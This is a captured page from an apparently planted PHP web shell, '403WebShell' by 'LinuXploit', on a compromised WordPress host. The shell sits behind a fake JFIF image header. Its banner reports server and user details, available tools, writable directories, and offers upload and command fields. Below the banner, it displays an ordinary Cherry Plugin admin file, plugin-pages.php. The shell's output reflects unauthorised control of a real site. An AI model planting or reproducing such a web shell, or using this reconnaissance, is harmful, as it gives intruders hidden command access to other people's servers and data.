????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.96.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/peekmysite.com/wp-content/plugins/cherry-plugin-x/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/peekmysite.com/wp-content/plugins/cherry-plugin-x/admin//plugin-pages.php
<?php
//Main plugin page
	if( !function_exists('cherry_plugin_main_page') ){
		function cherry_plugin_main_page(){
			$cherry_plugin_components = new cherry_plugin_components;
			$cherry_plugin_components -> get_header(array('title' => __('Cherry Plugin', CHERRY_PLUGIN_DOMAIN), 'wrapper_class' => 'cherry_plugin_main_page'));

			add_thickbox();
			?>

			<p><?php _e( 'Cherry Plugin has been released with intention to separate widgets, shortcodes and data management logics with theme editor options. Cherry Plugin is installed automatically on CherryFramework installation and is required for the correct work of CherryFramework.  ', CHERRY_PLUGIN_DOMAIN); ?></p><br>
				<div class="cols cols-2">
					<div class="col">
						<div class="plugin-option">
							<a href="#TB_inline?width=600&height=505&inlineId=help_import" class="demo-vid thickbox" title="<?php _e('Files Import demo', CHERRY_PLUGIN_DOMAIN); ?>"><i class="icon-facetime-video"></i></a>
							<div class="thumb-icon">
								<i class="icon-download-alt"></i>
							</div>
							<h4><a href="?page=import-page"><?php _e('Import', CHERRY_PLUGIN_DOMAIN); ?></a></h4>
							<p><small><?php _e('Option to import website content from the backup. Select all files from the backup archive and drag them to the upload files area to start uploading.', CHERRY_PLUGIN_DOMAIN); ?></small></p>
						</div>
					</div>

					<div class="col">
						<div class="plugin-option">
							<a href="#TB_inline?width=600&height=505&inlineId=help_export" class="demo-vid thickbox" title="<?php _e('Files Export demo', CHERRY_PLUGIN_DOMAIN); ?>"><i class="icon-facetime-video"></i></a>
							<div class="thumb-icon">
								<i class="icon-upload-alt"></i>
							</div>
							<h4><a href="?page=export-page"><?php _e('Export', CHERRY_PLUGIN_DOMAIN); ?></a></h4>
							<p><small><?php _e('Option to backup your website data creating a downloadable archive. Use this option to keep your website data on performing some serious modifications or moving website to other hosting.', CHERRY_PLUGIN_DOMAIN); ?></small></p>
						</div>
				</div>
			</div>
			<div class="cols cols-2">

				<div class="col">
					<div class="plugin-option">
						<div class="thumb-icon">
							<i class="icon-puzzle-piece"></i>
						</div>
						<h4><a href="widgets.php"><?php _e('Widgets', CHERRY_PLUGIN_DOMAIN); ?></a></h4>
						<p><small><?php _e('Cherry Widgets offer additional ways to place content to widget areas. Several available widget will allow you to add more functionality to your website.', CHERRY_PLUGIN_DOMAIN); ?></small></p>
					</div>
				</div>

				<div class="col">
					<div class="plugin-option">
						<div class="thumb-icon">
							<i class="icon-th-large"></i>
						</div>
						<h4><?php _e('Shortcodes', CHERRY_PLUGIN_DOMAIN); ?></h4>
						<p><small><?php _e('Cherry Plugin adds various widgets to the post editor. Shortcodes allow to create various content structures in WordPress posts. Use "Insert Shortcode" icon in post editor toolbar to add shortcodes.', CHERRY_PLUGIN_DOMAIN); ?> <a href="//info.template-help.com/help/quick-start-guide/wordpress-themes/master/index_en.html#shortcodes" target="_blank"><?php _e('Learn more', CHERRY_PLUGIN_DOMAIN); ?></a></small></p>
					</div>
				</div>

			</div>
			<?php
			echo cherry_plugin_help_import_popup().cherry_plugin_help_export_popup();
			$cherry_plugin_components -> get_footer();
		}
	}
//import settings page
	if( !function_exists('cherry_plugin_import_page') ){
		function cherry_plugin_import_page(){
			?>
			<script>
				if (typeof(window.FileReader) == 'undefined' && window.location.search.indexOf('not_supported=true')==-1) { 
					window.location.search = '?page=import-page&not_supported=true'; 
				}
			</script>
			<?php
			$response = wp_check_browser_version();
			$browser_not_supported = isset($_GET['not_supported']) 
									|| $response['name'] == 'Internet Explorer' && $response['version'] <= 9
									|| $response['name'] == 'Safari' && $response['version'] <= 6 ? true : false ;
			$holder_id = $browser_not_supported ? 'browser_nag' : '' ;
			$cherry_plugin_components = new cherry_plugin_components;
			$cherry_plugin_components -> get_header(array('title' => __('Cherry Content Import', CHERRY_PLUGIN_DOMAIN), 'wrapper_class' => 'impotr_export_wrapper', 'wrapper_id' => $holder_id));

			include_once (CHERRY_PLUGIN_DIR.'admin/import-export/import-check-settings.php');

			$cherry_plugin_components -> get_footer();
		}
	}
//export settings page
	if( !function_exists('cherry_plugin_export_page') ){
		function cherry_plugin_export_page(){
			$cherry_plugin_components = new cherry_plugin_components;
			$cherry_plugin_components -> get_header(array('title' => __('Cherry Content Export', CHERRY_PLUGIN_DOMAIN), 'wrapper_class' => 'impotr_export_wrapper'));

			include_once (CHERRY_PLUGIN_DIR.'admin/import-export/export.php');
			$cherry_plugin_components -> get_footer();
		}
	}
//under construction page
	if( !function_exists('cherry_maintenance_mode_admin_page') ){
		function cherry_maintenance_mode_admin_page(){
			$cherry_plugin_components = new cherry_plugin_components;
			$cherry_plugin_components -> get_header(array('title' => __('Maintenance Mode', CHERRY_PLUGIN_DOMAIN), 'wrapper_class' => ''));

			include_once (CHERRY_PLUGIN_DIR.'admin/plugin-maintenance-mode.php');

			$cherry_plugin_components -> get_footer();
		}
	}

Youez - 2016 - github.com/yon3zu
LinuXploit